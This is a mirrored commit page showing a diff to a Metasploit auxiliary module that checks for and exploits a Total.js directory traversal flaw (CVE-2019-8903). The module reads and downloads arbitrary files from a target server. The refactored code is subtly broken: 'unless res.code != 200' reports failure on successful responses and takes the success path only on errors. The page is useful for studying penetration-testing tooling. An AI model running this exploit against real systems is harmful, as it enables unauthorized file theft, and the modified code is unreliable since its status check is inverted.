infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Refactory and fix

master
Fabio Cogno 2019-03-10 19:33:08 +01:00
parent 0a5964d2a4
commit 14e0643962
1 changed files with 26 additions and 25 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

51
modules/auxiliary/scanner/http/totaljs_traversal.rb
View File

@ -1,10 +1,8 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
require 'msf/core'
# Check and exploit Total.js Directory Traversal (CVE-2019-8903) # Check and exploit Total.js Directory Traversal (CVE-2019-8903)
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
@ -68,7 +66,7 @@ class MetasploitModule < Msf::Auxiliary
print_status("App version: #{json['version']}") print_status("App version: #{json['version']}")
return Exploit::CheckCode::Vulnerable return Exploit::CheckCode::Vulnerable
end end
elsif res && res.headers['X-Powered-By'] =~ [Ttoaljs] elsif res && res.headers['X-Powered-By'].to_s.downcase.include?('total.js')
print_status('Target appear to be vulnerable!') print_status('Target appear to be vulnerable!')
print_status("X-Powered-By: #{res.headers['X-Powered-By']}") print_status("X-Powered-By: #{res.headers['X-Powered-By']}")
return Exploit::CheckCode::Detected return Exploit::CheckCode::Detected
@ -86,16 +84,18 @@ class MetasploitModule < Msf::Auxiliary
'method' => 'GET', 'method' => 'GET',
'uri' => uri 'uri' => uri
) )
if res && res.code == 200 unless res
print_status("Getting #{datastore['FILE']}...") print_error 'Generic error'
print_line(res.body) return
elsif res && res.code != 200 end
print_error("Unable to read '#{datastore['FILE']}', possibily because:") unless res.code != 200
print_error("Unable to read '#{datastore['FILE']}', possibly because:")
print_error("\t1. File does not exist.") print_error("\t1. File does not exist.")
print_error("\t2. No permission.") print_error("\t2. No permission.")
else return
print_error("[#{target_host}] - Generic error")
end end
print_status("Getting #{datastore['FILE']}...")
print_line(res.body)
end end
def download def download
@ -106,28 +106,29 @@ class MetasploitModule < Msf::Auxiliary
'method' => 'GET', 'method' => 'GET',
'uri' => uri 'uri' => uri
) )
if res && res.code == 200 unless res
fname = datastore['FILE'].split('/')[-1].chop print_error 'Generic error'
ctype = res.headers['Content-Type'].split(';') return
loot = store_loot('lfi.data', ctype[0], rhost, res.body, fname) end
print_good("File #{fname} downloaded to: #{loot}") unless res.code != 200
elsif res && res.code != 200 print_error("Unable to read '#{datastore['FILE']}', possibly because:")
print_error("Unable to read '#{datastore['FILE']}', possibily because:")
print_error("\t1. File does not exist.") print_error("\t1. File does not exist.")
print_error("\t2. No permission.") print_error("\t2. No permission.")
else return
print_error("[#{target_host}] - Generic error")
end end
fname = datastore['FILE'].split('/')[-1].chop
ctype = res.headers['Content-Type'].split(';')
loot = store_loot('lfi.data', ctype[0], rhost, res.body, fname)
print_good("File #{fname} downloaded to: #{loot}")
end end
def run def run
if action.name == 'CHECK' case action.name
when 'CHECK'
check check
when 'READ'
elsif action.name == 'READ'
read read
when 'DOWNLOAD'
elsif action.name == 'DOWNLOAD'
download download
end end
end end